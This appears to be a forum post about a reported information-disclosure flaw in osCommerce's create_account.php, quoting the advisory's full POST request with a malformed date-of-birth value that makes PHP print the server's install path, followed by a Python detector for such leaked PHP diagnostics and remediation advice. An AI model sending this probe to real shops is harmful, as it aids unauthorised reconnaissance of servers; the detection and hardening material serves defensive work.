osCommerce 'create_account.php' Information Disclosure Vulnerability
Once again, an information disclosure vulnerability has reportedly been found in osCommerce.
osCommerce is prone to an information-disclosure vulnerability because it fails to sanitize user-supplied input.
http://www.securityfocus.com/bid/31209/discuss
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
I suppose it only goes as far as exposing the directory...
POST /oscommerce/create_account.php
http://www.securityfocus.com/archive/1/496417
action=process&gender=m&firstname=john&lastname=smith&dob=FOOBAR&email_address=email (at) address (dot) com&company=foobar&street_address=foobar&suburb=foobar&postcode=foobar&city=foobar&state=foobar&country=1&telephone1=123456789&fax=123456789&newsletter=on&password=foobar&confirmation=foobar
Result:
Warning: checkdate() expects parameter 3 to be long, string given in /var/www/oscommerce/create_account.php on line 80
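A response-body check for this kind of leak, as an added example that is not part of the original post or the advisory: it finds PHP diagnostics that expose a filesystem path, in both the plain form shown above and the `<b>`-tagged form PHP emits when `html_errors` is on. The function name and the HTML and clean sample bodies are constructed for illustration.

```python
import html
import re

# PHP wraps level, path and line number in <b> tags when html_errors is on;
# strip them so one pattern covers both output styles.
_TAGS = re.compile(r"</?(?:b|br)\s*/?>", re.IGNORECASE)
_DIAG = re.compile(
    r"(?P<level>Fatal error|Parse error|Warning|Notice|Deprecated):\s+"
    r"(?P<message>.+?)\s+in\s+"
    r"(?P<path>(?:/|[A-Za-z]:\\)\S+)\s+on line\s+(?P<line>\d+)"
)

def find_php_disclosures(body):
    """Return one finding per PHP diagnostic that leaks an absolute path."""
    text = html.unescape(_TAGS.sub("", body))
    findings = []
    for m in _DIAG.finditer(text):
        path = m.group("path")
        sep = "\\" if "\\" in path else "/"
        findings.append({
            "level": m.group("level"),
            "message": m.group("message"),
            "script": path,
            "directory": path.rsplit(sep, 1)[0],  # what the response gives away
            "line": int(m.group("line")),
        })
    return findings

# The warning text quoted in the post, wrapped as it was in the advisory.
PLAIN_BODY = (
    "Warning: checkdate() expects parameter 3 to be long, string given in\n"
    "/var/www/oscommerce/create_account.php on line 80"
)
# Constructed: the same warning as PHP renders it with html_errors enabled.
HTML_BODY = (
    "<br />\n<b>Warning</b>:  checkdate() expects parameter 3 to be long, "
    "string given in <b>/var/www/oscommerce/create_account.php</b> "
    "on line <b>80</b><br />"
)
# Constructed: a normal page that mentions a warning but leaks nothing.
CLEAN_BODY = "<html><body>Warning: please log in to continue.</body></html>"

if __name__ == "__main__":
    for name, body in [("plain", PLAIN_BODY), ("html", HTML_BODY), ("clean", CLEAN_BODY)]:
        print(name, find_php_disclosures(body))
```

Any finding means the application is rendering PHP diagnostics to the client; the usual remedy is to validate the date field before it reaches `checkdate()` and to set `display_errors` off with `log_errors` on in production.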